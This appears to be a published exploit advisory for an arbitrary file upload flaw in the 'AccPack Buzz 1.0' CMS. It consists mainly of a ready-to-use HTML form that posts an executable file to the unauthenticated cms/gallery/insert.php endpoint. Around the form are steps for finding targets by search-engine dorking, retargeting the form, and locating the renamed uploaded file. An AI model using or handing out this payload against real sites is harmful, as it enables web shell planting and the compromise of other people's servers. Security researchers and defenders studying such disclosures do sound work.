AccPack Buzz 1.0 Arbitrary File Upload

=============================================================================================================================================
| # Title : AccPack Buzz v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : http://webpay.com.np/#Product |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] use payload :

<html>
<head>
<title>Add</title>
</head>
<body>
<div align=”center”>
<form action=”http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php” method=”POST” enctype=”multipart/form-data”>
<table>
<tr>
<td>Image</td><td>
<input type=”file” name=”image-upload” id=”image-upload”></td>
</tr>
<tr>
<td>Status</td><td>
<input type=”radio” name=”status” id=”actiive” value=”1″ checked /> <label for=”active”>Active</label>
<input type=”radio” name=”status” id=”passive” value=”0″ /><label for=”passive”>Passive</label>
</td>
</tr>
<tr style=’height:80′>
<td colspan=”2″><input type=’submit’ value=’Submit’><input type=’reset’ Value=’Reset’></td>
</tr>
</table>
</form>
</div>
</body>
</html>

[+] In the seventh line, we change the link to the target link.

[+] Link to the uploaded files : cms/image/gallery/

[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

نوشته های مشابه